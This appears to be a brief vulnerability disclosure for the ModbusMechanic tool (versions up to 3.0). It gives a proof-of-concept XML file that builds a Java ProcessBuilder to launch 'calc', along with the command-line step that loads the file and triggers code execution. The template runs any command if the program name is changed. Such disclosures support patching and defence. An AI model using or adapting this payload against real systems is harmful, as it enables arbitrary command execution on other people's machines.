Affected Version: <= v3.0(latest release version)
Application: Here
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java>Save the above code as PoC.xml file and put it in the project directory. Use the command "java -jar ModbusMechanic.jar -bridge PoC.xml" to start the jar package to trigger the vulnerability.
